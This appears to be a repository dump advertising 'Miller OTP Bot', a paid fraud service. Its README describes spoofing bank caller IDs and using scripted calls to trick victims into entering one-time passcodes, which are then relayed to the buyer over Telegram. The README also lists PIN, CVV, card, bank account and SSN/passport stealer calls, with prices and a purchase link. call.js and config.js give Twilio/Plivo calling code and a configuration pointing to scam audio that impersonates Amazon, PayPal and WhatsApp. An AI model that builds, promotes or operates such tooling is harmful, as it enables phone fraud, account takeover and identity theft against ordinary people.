├── README.md
├── SECURITY.md
├── call.js
├── config
├── README.md
├── api
│ └── api.js
└── config.js
└── img
├── README.md
└── call-js-preview.png
/README.md:
--------------------------------------------------------------------------------
1 | ## Miller OTP Bot | #1 Advanced & Oldest Telegram OTP Bot
2 |
3 | ### First of all, what is OTP bot? Let's start with the question.
4 | #### Then we will continue with the features of Miller OTP Bot.
5 |
6 |
7 | _OTP Bot is a software that uses advanced ready-made scripts to deceive the victim with or without caller ID spoofer.
8 | As an example scenario: The victim feels as if he is being called by a real bank customer representative because the number on the screen is the bank's number.
9 | The bot indicates that there is suspicious activity in the victim's account and is asked to enter the 6-digit code sent to his phone on the numpad during the call in order to block this activity and secure the account.
10 | As soon as the victim dials OTP, OTP bot sends this code (OTP) to the person using OTP bot. (via telegram message)_
11 | _In this way, the person using the OTP bot obtains OTP anonymously._
12 |
13 |
14 | > [!IMPORTANT]
15 | Miller OTP Bot Has Support for 60+ Country for Calls, \
16 | 10+ Different Language/Voice For Calls with Translation System and Realistic AI Voice.
17 |
18 | ### 🤖 Miller OTP Bot's Features 🤖
19 |
20 | ■ __200+ Ready Scripts For Easy Use__ \
21 | ■ __OTP Bypass Modes__ \
22 | ■ __Caller ID Spoofer for Bank/Payment Service Numbers__ \
23 | ■ __Every OTP, 2FA Codes Support for Steal__ \
24 | ■ __Intercept SMS Modes__ \
25 | ■ __SMS Sender Changer Modes__ \
26 | ■ __PIN,CVV Stealer Calls__ \
27 | ■ __CC Stealer Phising Calls__ \
28 | ■ __Bank Account Infos Stealer Calls__ \
29 | ■ __SSN/DOB/Passport Infos Stealer Calls__
30 |
31 |
32 |
33 | ### Miller OTP Bot Prices | Crypto Payment Active on otpbot.club 🪙
34 |
35 | **■ 7 Days Subscription For Miller OTP Bot** | __$149__ \
36 | **■ 15 Days Subscription for Miller OTP Bot** | __$249__ \
37 | **■ 30 Days VIP+ Pack** | __$499__ \
38 | **■ Lifetime VIP+ Pack** | __$1499__
39 |
40 |
41 |
42 | **⚜️ Miller OTP Bot Official Site - Purchase**: https://otpbot.club \
43 | **📲 Miller OTP Bot**: https://t.me/millerotpbot
44 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security Policy
2 |
3 | ## Supported Versions
4 |
5 | Use this section to tell people about which versions of your project are
6 | currently being supported with security updates.
7 |
8 | | Version | Supported |
9 | | ------- | ------------------ |
10 | | 5.1.x | :white_check_mark: |
11 | | 5.0.x | :x: |
12 | | 4.0.x | :white_check_mark: |
13 | | < 4.0 | :x: |
14 |
15 | ## Reporting a Vulnerability
16 |
17 | Use this section to tell people how to report a vulnerability.
18 |
19 | Tell them where to go, how often they can expect to get an update on a
20 | reported vulnerability, what to expect if the vulnerability is accepted or
21 | declined, etc.
22 |
--------------------------------------------------------------------------------
/call.js:
--------------------------------------------------------------------------------
1 | // Include Twilio and Plivo SDKs
2 | const twilio = require('twilio');
3 | const plivo = require('plivo');
4 |
5 | // Initialize Twilio and Plivo clients with your API credentials
6 | const twilioClient = new twilio('YOUR_TWILIO_ACCOUNT_SID', 'YOUR_TWILIO_AUTH_TOKEN');
7 | const plivoClient = plivo.RestAPI({
8 | authId: 'YOUR_PLIVO_AUTH_ID',
9 | authToken: 'YOUR_PLIVO_AUTH_TOKEN'
10 | });
11 |
12 | // Function to send OTP via call using Twilio
13 | function sendOTPCall(targetNumber, otp) {
14 | twilioClient.calls.create({
15 | url: 'http://your-server.com/otp-voice.xml', // XML file for OTP voice message
16 | to: targetNumber,
17 | from: 'YOUR_TWILIO_PHONE_NUMBER'
18 | })
19 | .then(call => console.log(call.sid))
20 | .catch(error => console.error(error));
21 | }
22 |
23 | // Example otp bot text-to-speech messages via call
24 | // Function to send bot's text-to-speech message via call using Plivo
25 | function sendBotCall(targetNumber, message) {
26 | plivoClient.make_call({
27 | from: 'YOUR_PLIVO_PHONE_NUMBER',
28 | to: targetNumber,
29 | answer_url: 'http://your-server.com/bot-message.xml?message=' + encodeURIComponent(message) // XML file for bot's message
30 | }, function(status, response) {
31 | console.log('Status: ', status);
32 | console.log('API Response:\n', response);
33 | });
34 | }
35 |
36 | // Example usage
37 | const targetNumber = 'TARGET_PHONE_NUMBER';
38 | const yourscript = 'YOUR_SENTENCES';
39 | const otp = '';
40 | const botMessage = yourscript;
41 |
42 | sendOTPCall(targetNumber, otp);
43 | sendBotCall(targetNumber, botMessage);
44 |
--------------------------------------------------------------------------------
/config/README.md:
--------------------------------------------------------------------------------
1 | **More sample codes will be added.**
2 |
3 | **Stay with Miller Otp Bot | Javascript**
4 |
5 | **https://otpbot.club**
6 |
--------------------------------------------------------------------------------
/config/api/api.js:
--------------------------------------------------------------------------------
1 | var app = require('./app');
2 | var config = require('./config');
3 | var http = require('http');
4 | var server = http.createServer(app);
5 | server.listen(config.port || 80, function() {
6 | console.log('Express server started on *:' + config.port);
7 | });
8 |
--------------------------------------------------------------------------------
/config/config.js:
--------------------------------------------------------------------------------
1 | module.exports = {
2 | setupdone: 'false',
3 | accountsid: '',
4 | authToken: '',
5 | callerid: '+yourcallerid',
6 |
7 | apipassword: 'passwordtochange',
8 | serverurl: 'http://yourserverip:777',
9 | port: process.env.PORT || 777,
10 |
11 | amazonfilepath: './us/amazon/sc-amazon.mp3',
12 | paypalfilepath: './us/fr/paypal/sc-pp.mp3',
13 | whatsappfilepath: './us/whatsapp/sc-whatsapp.mp3',
14 | endfilepath: './us/end/call-end.mp3',
15 | defaultfilepath: './us/default/sc-default.mp3',
16 | };
17 |
--------------------------------------------------------------------------------
/img/README.md:
--------------------------------------------------------------------------------
1 | Only for Miller Otp Bot's Introduction Metarials
2 |
--------------------------------------------------------------------------------
/img/call-js-preview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/millerjsdev/otp-bot/525f068f597650a4b683d143c9cbf38b7dd1659b/img/call-js-preview.png
--------------------------------------------------------------------------------